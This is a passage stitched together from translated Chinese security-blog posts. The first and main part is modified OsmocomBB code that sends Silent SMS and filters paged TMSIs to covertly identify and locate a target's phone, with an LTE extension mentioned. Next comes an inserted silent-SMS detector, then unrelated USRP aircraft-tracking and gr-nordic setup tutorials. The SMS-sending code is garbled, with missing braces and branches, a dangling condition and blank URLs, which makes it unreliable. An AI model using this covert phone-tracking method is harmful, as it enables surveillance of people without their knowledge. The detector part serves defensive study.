    struct gsm_sms *sms = sms_alloc();

    if (!sms)
        return NULL;

    strncpy(sms->text, text, sizeof(sms->text)-1);

    sms->reply_path_req = 0;
    sms->status_rep_req = 0;
    sms->ud_hdr_ind = 0;
    if (
        sms->protocol_id = 0x40; /* type 0 */
        sms->protocol_id = 0; /* implicit */
    if (silent_sms.dcs)
        sms->data_coding_scheme = 0xC0;
        sms->data_coding_scheme = dcs;
    strncpy(sms->address, receiver, sizeof(sms->address)-1);
    /* Generate user_data */
    sms->user_data_len = gsm_7bit_encode(sms->user_data, sms->text);

    return sms;


void sms_ping(void *data)
    struct osmocom_ms *ms;

    ms = get_ms("1", call_vty);
    vty_notify(ms, "ping sent");

    if(smscnt == 0){
        return 0;

    sms_send(ms, ping_sms_sca, ping_number, ping_sms_txt);
    return 0;
static int gsm411_sms_report(struct osmocom_ms *ms, struct gsm_sms *sms,
    uint8_t cause)
    vty_notify(ms, NULL);
    if (!cause){
        vty_notify(ms, "SMS %d to %s successfull\n", smscnt, sms->address);
        if(smscnt != 0)
            osmo_timer_schedule(&tick_timer_smsping, 10, 0);//定时间隔10秒

        vty_notify(ms, "SMS to %s failed: %s\n", sms->address,
            get_value_string(gsm411_rp_cause_strs, cause));
    return 0;

Sending a Silent SMS from mobile's command line:


Sniffing the sent message with Wireshark, we can see that TP-PID and TP-DCS are 0x40 and 0xC0 respectively, and that the message text is "testing 1 2 3":
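Those same two header fields are what a receive-side detector looks for. The following C code is an added example, not code from the original post or from OsmocomBB: it parses the fixed header of an SMS-DELIVER TPDU (the GSM 03.40 layout: first octet, TP-OA, TP-PID, TP-DCS, TP-SCTS, TP-UDL) and flags a message as silent when TP-PID is 0x40 or TP-DCS falls in the 0xC0-0xCF "message waiting, discard" coding group, which generalises the single 0xC0 value used above to the whole discard group. The TPDUs in the block are constructed samples, not captured traffic.

```c
/* Added example: receive-side Silent SMS classifier for SMS-DELIVER TPDUs.
 * Not from the original post or OsmocomBB; the sample TPDUs are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

struct sms_deliver_hdr {
    uint8_t mti;        /* TP-MTI, low two bits of the first octet (0 = SMS-DELIVER) */
    uint8_t oa_digits;  /* number of digits in TP-OA */
    uint8_t pid;        /* TP-PID */
    uint8_t dcs;        /* TP-DCS */
    uint8_t udl;        /* TP-UDL */
    size_t ud_offset;   /* offset of TP-UD inside the TPDU */
};

/* Silent if the protocol id is "Short Message Type 0" or the DCS is in the
 * "Message Waiting Indication: discard message" group (0xC0..0xCF). */
int is_silent_sms(uint8_t pid, uint8_t dcs)
{
    return pid == 0x40 || (dcs & 0xF0) == 0xC0;
}

/* Parse the fixed part of an SMS-DELIVER TPDU.
 * Returns 0 on success, -1 if the buffer is truncated or not an SMS-DELIVER. */
int parse_sms_deliver(const uint8_t *tpdu, size_t len, struct sms_deliver_hdr *h)
{
    size_t oa_octets, pos;

    if (len < 3)
        return -1;
    h->mti = tpdu[0] & 0x03;
    if (h->mti != 0)                     /* only SMS-DELIVER is handled here */
        return -1;
    h->oa_digits = tpdu[1];
    oa_octets = (h->oa_digits + 1) / 2;  /* BCD digits, two per octet */
    pos = 3 + oa_octets;                 /* skip length, type-of-address, digits */
    /* TP-PID (1) + TP-DCS (1) + TP-SCTS (7) + TP-UDL (1) must fit */
    if (len < pos + 10)
        return -1;
    h->pid = tpdu[pos];
    h->dcs = tpdu[pos + 1];
    h->udl = tpdu[pos + 9];
    h->ud_offset = pos + 10;
    return 0;
}

/* Convenience wrapper: 1 = silent, 0 = ordinary, -1 = malformed. */
int classify_sms_deliver(const uint8_t *tpdu, size_t len)
{
    struct sms_deliver_hdr h;
    if (parse_sms_deliver(tpdu, len, &h) < 0)
        return -1;
    return is_silent_sms(h.pid, h.dcs);
}

/* Constructed sample: SMS-DELIVER from +1234567890 with TP-PID 0x40 and
 * TP-DCS 0xC0, user data "Hi" packed as GSM 7-bit (C8 34). */
const uint8_t silent_tpdu[] = {
    0x04,                                      /* TP-MTI = DELIVER, TP-MMS = 1 */
    0x0A, 0x91,                                /* TP-OA: 10 digits, international */
    0x21, 0x43, 0x65, 0x87, 0x09,              /* 1234567890 in swapped BCD */
    0x40,                                      /* TP-PID: Short Message Type 0 */
    0xC0,                                      /* TP-DCS: MWI discard */
    0x71, 0x10, 0x21, 0x12, 0x00, 0x00, 0x00,  /* TP-SCTS (constructed) */
    0x02,                                      /* TP-UDL: 2 septets */
    0xC8, 0x34                                 /* TP-UD "Hi" */
};

/* Same message with default TP-PID (0x00) and GSM 7-bit TP-DCS (0x00). */
const uint8_t normal_tpdu[] = {
    0x04, 0x0A, 0x91, 0x21, 0x43, 0x65, 0x87, 0x09,
    0x00, 0x00,
    0x71, 0x10, 0x21, 0x12, 0x00, 0x00, 0x00,
    0x02, 0xC8, 0x34
};

int main(void)
{
    printf("silent sample -> %d\n", classify_sms_deliver(silent_tpdu, sizeof(silent_tpdu)));
    printf("normal sample -> %d\n", classify_sms_deliver(normal_tpdu, sizeof(normal_tpdu)));
    printf("truncated     -> %d\n", classify_sms_deliver(silent_tpdu, 10));
    return 0;
}
```

A handset-side monitor that hooks the SMS-DELIVER path before the discard decision can log the originating address and timestamp of every message this classifier flags, which turns an invisible probe into an auditable event.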


0x05 How to Filter the TMSI


As soon as we start sending Silent SMS, we immediately start ccch_scan to record every paged TMSI. Usually, from the moment the SMS is sent until the Paging message appears over the air takes at least 3 seconds, and in most cases 6-7 seconds. A busy base station broadcasts more than 20 pages per second, so a TMSI queue depth of 300 is sufficient: it records roughly all TMSIs paged within 15 seconds of sending the Silent SMS, and the target's TMSI is certain to be among these 300, usually near the start. The queue stops at 300 entries, and within those 300 we find the TMSIs repeated more than the configured number of times and print them.


/* Additions to OsmocomBB's ccch_scan application. They assume the fields
 * finding, mincnt, tmsicnt, tmsi_matched and wanted_tmsi were added to the
 * existing app_state structure next to kc. */
#include <stdio.h>
#include <string.h>
#include <osmocom/core/utils.h>     /* osmo_hexdump */

/* Bounded queue of TMSIs seen on the PCH and how often each was paged. */
struct _tmsis_ {
    uint8_t     tmsi[4];
    char        cnt;
} tmsis[300];

/* Called for every TMSI found in a Paging Request: counts repeats and
 * reports a TMSI once it has been paged more than mincnt times. */
void tmsi_match(uint8_t *t)
{
    int i;
    int f = 0;      /* set when t is already in the queue */

    for (i = 0; i < app_state.tmsicnt; i++) {
        if (!memcmp(tmsis[i].tmsi, t, 4)) {
            f = 1;
            tmsis[i].cnt++;
            if (tmsis[i].cnt > app_state.mincnt)
                printf("Possible TMSI: #%d, \t%s, %d times\n", i, osmo_hexdump(t, 4), tmsis[i].cnt);
            break;
        }
    }
    /* Unknown TMSI: append it while the 300-entry queue still has room. */
    if (!f && app_state.tmsicnt < 300) {
        memcpy(tmsis[i].tmsi, t, 4);
        tmsis[i].cnt = 1;
        app_state.tmsicnt += 1;
        printf("New TMSI:#%d, %s \tTotal: %d\n", i, osmo_hexdump(t, 4), app_state.tmsicnt);
    }
    if (!memcmp(t, app_state.wanted_tmsi, 4)) {
        app_state.tmsi_matched = 1;
        printf("TMSI Match %s\n", osmo_hexdump(t, 4));
    }
}

We add a new parameter to ccch_scan: -f, the number of pagings.

In many places in China, to improve the call completion rate, the paging message is repeated whenever a Mobile Terminated Service has to be delivered: some networks page twice, others up to four times in a row. So if you send 10 messages in a row to the target phone, you may observe 20-40 pagings. In practice you therefore need to listen to the network's PCH first to determine the local configuration.

/* ccch_scan command-line handling with the new -f option. */
static int l23_cfg_print_help()
{
    printf("\nApplication specific\n");
    printf("  -k --kc KEY           Key to use to try to decipher DCCHs\n");
    printf("  -t --tmsi TMSI        Filter assignments with specified TMSI (paging only)\n");
    printf("  -f --count N          Filter paging TMSI (report after more than N pagings)\n");

    return 0;
}

static int l23_cfg_handle(int c, const char *optarg)
{
    switch (c) {
    case 'k':
        if (osmo_hexparse(optarg, app_state.kc, 8) != 8) {
            fprintf(stderr, "Invalid Kc\n");
            exit(-1);
        }
        break;
    case 't':
        if (osmo_hexparse(optarg, app_state.wanted_tmsi, 4) != 4) {
            fprintf(stderr, "Invalid TMSI\n");
            exit(-1);
        }
        app_state.finding = 0;      /* match a known TMSI instead of searching */
        break;
    case 'f':
        app_state.finding = 1;      /* search mode: count repeated pagings */
        app_state.mincnt = atoi(optarg);
        break;
    default:
        return -1;
    }
    return 0;
}





We take out the target phone to check, and it is indeed this TMSI. Note that, for convenience, the Chaoyang residents (朝阳群众) mostly carry this kind of Nokia 3110 with Net Monitor enabled:






0x06 Afterword


This article has not covered TMSI filtering and phone locating under LTE, but the Paging principle is similar; downlink data packets also trigger Paging before delivery, and since the operators' 2G/3G/4G networks interoperate, there are even more usable avenues. The only problem is the lack of an LTE phone with an open-source baseband: to play with LTE we have to use an SDR, which makes the cost less affordable. Even if the Silent SMS can still be sent with a C118/C139, listening to LTE traffic requires an SDR. Moreover, because of China's particular spectrum allocation, LTE did not get the low "golden" bands and sits mostly around 1900 MHz and 2600 MHz, which puts it beyond the reach of a cheap RTL-SDR; for LTE you need at least a HackRF, and the quality of domestic HackRF clones is still unstable...


Exploring the Wireless World with USRP, Part 1: From USRP Basics to Tracking Aircraft Flight Paths


Author: 雪碧0xroot @ 漏洞盒子 (Vulbox) Security Team

0x00 Preface

Among the popular SDR hardware platforms, USRP is one of the more mature in both functionality and applications: it supports everything from Wi-Fi, ZigBee, RFID, GSM and LTE 4G to aircraft and satellite communications very well. Software developers use it to build applications, while security engineers use it to test and research wireless communication protocols.



(TV dongle + dump1090, 2D)





0x01 Hardware

PC: Ubuntu or Mac



0x02 Software


apt-get update
apt-get install git
apt-get install python-pip

pip install --upgrade pip
pip install git+

pybombs recipes add gr-recipes git+
pybombs recipes add gr-etcetera git+
pybombs prefix init /usr/local -a myprefix -R gnuradio-default
pybombs install gqrx gr-osmosdr uhd

The above shows how to install the SDR software on Ubuntu; on Mac OS X you can install it with MacPorts instead.


After installing UHD (USRP Hardware Driver) with pybombs, you also need to download the firmware and FPGA images; run:

python  /usr/local/lib/uhd/utils/









git clone
cd gr-air-modes
mkdir build
cd build
cmake ..
sudo make install
sudo ldconfig

2.4 Install Google Earth

Ubuntu 32 bit:


Ubuntu 64 bit:

sudo dpkg -i google-earth-stable_current_amd64.deb

Mac OS X:



0x03 Decoding Aircraft Signals & Importing into Google Earth

cd gr-air-modes/apps/
./modes_rx -K test.kml




(Aircraft flight track, 3D)


0x04 Demo Video

0x05 References

USRP B200: Exploring the Wireless World

Aircraft Tracking with Mode S: Modez & Aviation Mapper


0x01 System Installation

Download Ubuntu 16.04

0x02 Setting Up the SDR Development Environment


apt-get update
apt-get install git
apt-get install python-pip
pip install --upgrade pip
pip install git+


pybombs recipes add gr-recipes git+  
pybombs recipes add gr-etcetera git+


pybombs install osmo-sdr rtl-sdr gnuradio hackrf airspy gr-iqbal libosmo-dsp gr-osmosdr gqrx


git clone
cd bladeRF/host
mkdir build
cd build
cmake ../
sudo make install
sudo ldconfig

0x03 Building gr-nordic

gr-nordic:GNU Radio module and Wireshark dissector for the Nordic Semiconductor nRF24L Enhanced Shockburst protocol.

git clone
cd gr-nordic/
mkdir build
cd build/
cmake ../
sudo make install
sudo ldconfig

0x04 Installing Wireshark

apt-get install wireshark

On Ubuntu, accessing network interfaces requires root privileges. Wireshark itself is only a UI on top of /usr/bin/dumpcap, and dumpcap needs root, so a non-root user cannot read the interface list. The workaround is to start the capture with sudo wireshark, but when Wireshark runs as root it will not load Lua scripts. Solution:

sudo -s  
groupadd wireshark  
usermod -a -G wireshark <your-username>
chgrp wireshark /usr/bin/dumpcap  
chmod 750 /usr/bin/dumpcap 

setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
getcap /usr/bin/dumpcap


/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip



0x05 Packet Capture



gr-nordic$ wireshark -X lua_script:wireshark/nordic_dissector.lua -i lo -k -f udp

gr-nordic$ cd example


0x06 Demo Video

0x07 Thanks & References

gr-nordic: GNU Radio module and Wireshark dissector for the Nordic Semiconductor nRF24L Enhanced Shockburst protocol.

孤独小白: GNU Radio Tutorial (Part 1)

Sniffing with Wireshark as a Non-Root User

Bastille security researchers: Marc Newlin, Balint Seeber